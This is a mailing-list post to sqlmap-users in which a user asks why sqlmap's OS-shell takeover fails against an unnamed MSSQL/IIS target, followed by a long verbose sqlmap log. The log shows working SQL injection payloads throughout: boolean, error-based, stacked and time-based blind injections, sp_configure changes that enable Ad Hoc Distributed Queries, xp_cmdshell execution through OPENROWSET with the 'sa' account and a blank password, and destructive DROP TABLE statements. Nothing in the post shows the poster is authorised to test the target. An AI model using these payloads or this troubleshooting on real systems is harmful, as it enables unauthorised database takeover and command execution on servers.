hey,
i am trying to write on mssql with either os-shell or any other flag (non
works for me)
i know that 'Ad Hoc Distributed Queries are disabled -> OpenRowSet is
disabled as well
sqlmap initially gets into the db as a secondary user, there are 2 users in
the db, SA which is the administrator and the other user which sqlmap gets
at start
the password for sa is NULL - no password at all, i know that by executing
--users --passwords
so with all this data i am trying to run:
sqlmap -u "target" --risk=5 --level=5 --random-agent --threads=10 -o
--os-shell --dbms-cred=sa: --fresh-queries -v3 --parse-errors -t
traffic.txt
--sql-file=/usr/share/sqlmap/procs/mssqlserver/configure_openrowset.sql
i also tried without the sql-file as i guess sqlmap should try it by itself
but i get the same results
so my guess is the sqlmap can't get into the 'sa' user because if it could
get in, it would enable the openrowset. am i right?
i can send the traffic.txt privately
**********************
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: keyword
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: keyword=f') AND 1202=1202 AND ('NhGb' LIKE 'NhGb
Vector: AND [INFERENCE]
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
clause
Payload: keyword=f') AND 7343=CONVERT(INT,(SELECT
CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN
(7343=7343) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND ('PGJx' LIKE
'PGJx
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT
'[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: keyword=f'); WAITFOR DELAY '0:0:5'--
Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: keyword=f') WAITFOR DELAY '0:0:5'--
Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
[03:57:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[03:57:43] [INFO] executing SQL statements from given file(s)
[03:57:43] [ERROR] unresolved variable 'ENABLE' in SQL file
'/usr/share/sqlmap/procs/mssqlserver/configure_openrowset.sql'
do you want to provide the substitution values? [y/N] y
insert value for variable 'ENABLE': 1
[03:57:46] [DEBUG] executing SQL data execution query: 'EXEC
master..sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE;
EXEC master..sp_configure 'Ad Hoc Distributed Queries', 1; RECONFIGURE WITH
OVERRIDE; EXEC sp_configure 'show advanced options', 0; RECONFIGURE WITH
OVERRIDE'
[03:57:46] [PAYLOAD] f');EXEC master..sp_configure 'SHOW advanced options',
1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed
Queries', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'SHOW advanced
options', 0; RECONFIGURE WITH OVERRIDE--
[03:57:46] [WARNING] time-based comparison requires larger statistical
model, please wait..............................
[03:57:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:57:53] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[03:57:53] [DEBUG] done
EXEC master..sp_configure 'show advanced options', 1; RECONFIGURE WITH
OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed Queries', 1;
RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'show advanced options', 0;
RECONFIGURE WITH OVERRIDE: 'NULL'
[03:57:53] [DEBUG] going to use D:/Microsoft SQL
Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log as temporary files directory
on Microsoft SQL Server 2005 and 2008, OPENROWSET function is disabled by
default. This function is needed to execute statements as another DBMS user
since you provided the option '--dbms-creds'. If you are DBA, you can
enable it. Do you want to enable it? [Y/n] Y
[03:59:06] [PAYLOAD] f');EXEC master..sp_configure 'SHOW advanced options',
1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed
Queries', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'SHOW advanced
options', 0; RECONFIGURE WITH OVERRIDE--
[03:59:06] [WARNING] it is very important not to stress the network adapter
during usage of time-based payloads to prevent potential errors
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[03:59:06] [INFO] testing if current user is DBA
[03:59:06] [PAYLOAD] f') AND 7808=CONVERT(INT,(SELECT
CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN
(IS_SRVROLEMEMBER(CHAR(115)+CHAR(121)+CHAR(115)+CHAR(97)+CHAR(100)+CHAR(109)+CHAR(105)+CHAR(110))=1)
THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND ('FSjT' LIKE
'FSjT
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message:
'System.Data.SqlClient.SqlException: Conversion failed when converting the
varchar value 'qsgjq0qywuq' to data type int.'
[03:59:06] [DEBUG] performed 1 queries in 0.13 seconds
[03:59:06] [WARNING] functionality requested probably does not work because
the curent session user is not a database administrator
[03:59:06] [DEBUG] creating a support table to write commands standard
output to
[03:59:06] [PAYLOAD] f');DROP TABLE sqlmapoutput--
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[03:59:06] [PAYLOAD] f');CREATE TABLE sqlmapoutput(id INT PRIMARY KEY
IDENTITY, data NVARCHAR(4000))--
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[03:59:06] [INFO] testing if xp_cmdshell extended procedure is usable
[03:59:06] [PAYLOAD] f');SELECT * FROM
OPENROWSET('SQLOLEDB','';'sa';'NULL','SET FMTONLY OFF DECLARE @ktdg
VARCHAR(8000);SET
@ktdg=0x6563686f2031203e2022443a2f4d6963726f736f66742053514c205365727665722f4d5353514c31305f35302e4d5353514c5345525645522f4d5353514c2f4c6f672f746d70636f6974652e74787422;EXEC
master..xp_cmdshell @ktdg')--
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message:
'System.Data.SqlClient.SqlException: SQL Server blocked access to STATEMENT
'OpenRowset/OpenDatasource' of component 'Ad Hoc Distributed Queries'
because this component is turned off as part of the security configuration
for this server. A system administrator can enable the use of 'Ad Hoc
Distributed Queries' by using sp_configure. For more information about
enabling 'Ad Hoc Distributed Queries', see "Surface Area Configuration" in
SQL Server Books Online.'
[03:59:06] [PAYLOAD] f');BULK INSERT sqlmapoutput FROM 'D:/Microsoft SQL
Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log/tmpcoite.txt' WITH (CODEPAGE='RAW',
FIELDTERMINATOR='WaPrHIHUBH', ROWTERMINATOR='vOTmRkjwAa')--
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message:
'System.Data.SqlClient.SqlException: You do not have permission to use the
bulk load statement.'
[03:59:06] [PAYLOAD] f');SELECT * FROM
OPENROWSET('SQLOLEDB','';'sa';'NULL','SET FMTONLY OFF DECLARE @wgiw
VARCHAR(8000);SET
@wgiw=0x64656c202f46202f5120443a5c4d6963726f736f66742053514c205365727665725c4d5353514c31305f35302e4d5353514c5345525645525c4d5353514c5c4c6f675c746d70636f6974652e747874;EXEC
master..xp_cmdshell @wgiw')--
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:07] [WARNING] parsed DBMS error message:
'System.Data.SqlClient.SqlException: SQL Server blocked access to STATEMENT
'OpenRowset/OpenDatasource' of component 'Ad Hoc Distributed Queries'
because this component is turned off as part of the security configuration
for this server. A system administrator can enable the use of 'Ad Hoc
Distributed Queries' by using sp_configure. For more information about
enabling 'Ad Hoc Distributed Queries', see "Surface Area Configuration" in
SQL Server Books Online.'
[03:59:07] [PAYLOAD] f') AND 9097=CONVERT(INT,(SELECT
CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT
ISNULL(CAST(COUNT(data) AS NVARCHAR(4000)),CHAR(32)) FROM
sqlmapoutput)+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND
('tzMl' LIKE 'tzMl
[03:59:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:07] [WARNING] parsed DBMS error message:
'System.Data.SqlClient.SqlException: Conversion failed when converting the
nvarchar value 'qsgjq0qywuq' to data type int.'
[03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT
ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM
sqlmapoutput),1,1))>51 AND ('EirG' LIKE 'EirG
[03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT
ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM
sqlmapoutput),1,1))>54 AND ('EirG' LIKE 'EirG
[03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT
ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM
sqlmapoutput),1,1))>56 AND ('EirG' LIKE 'EirG
[03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT
ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM
sqlmapoutput),1,1))>57 AND ('EirG' LIKE 'EirG
[03:59:07] [INFO] retrieved:
[03:59:07] [DEBUG] performed 4 queries in 0.38 seconds
[03:59:07] [WARNING] multi-threading is considered unsafe in time-based
data retrieval. Going to switch it off automatically
[03:59:07] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>51) WAITFOR DELAY
'0:0:5'--
[03:59:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:07] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[03:59:07] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>48) WAITFOR DELAY
'0:0:5'--
[03:59:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:08] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[03:59:08] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>1) WAITFOR DELAY
'0:0:5'--
[03:59:13] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:13] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
do you want sqlmap to try to optimize value(s) for DBMS delay responses
(option '--time-sec')? [Y/n] y
[04:00:34] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>47) WAITFOR DELAY
'0:0:5'--
[04:00:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:39] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[04:00:39] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))!=48) WAITFOR DELAY
'0:0:5'--
[04:00:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:39] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[04:00:39] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>51) WAITFOR DELAY
'0:0:5'--
[04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:40] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[04:00:40] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>48) WAITFOR DELAY
'0:0:5'--
[04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:40] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[04:00:40] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>1) WAITFOR DELAY
'0:0:5'--
[04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:40] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[04:00:40] [INFO] retrieved: 0
[04:00:40] [DEBUG] performed 8 queries in 92.65 seconds
[04:00:40] [PAYLOAD] f');DELETE FROM sqlmapoutput--
[04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:40] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[04:00:40] [ERROR] it seems that the temporary directory ('D:/Microsoft SQL
Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log') used for storing console output
within the back-end file system does not have writing permissions for the
DBMS process. You are advised to manually adjust it with option --tmp-path
switch or you will not be able to retrieve the commands output
[04:00:40] [INFO] going to use xp_cmdshell extended procedure for operating
system command execution
[04:00:40] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and
press ENTER
os-shell> x
------------------------------------------------------------------------------
Learn Graph Databases - Download FREE O'Reilly Book
"Graph Databases" is the definitive new guide to graph databases and their
applications. Written by three acclaimed leaders in the field,
this first edition is now available. Download your free book today!
http://p.sf.net/sfu/13534_NeoTech
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
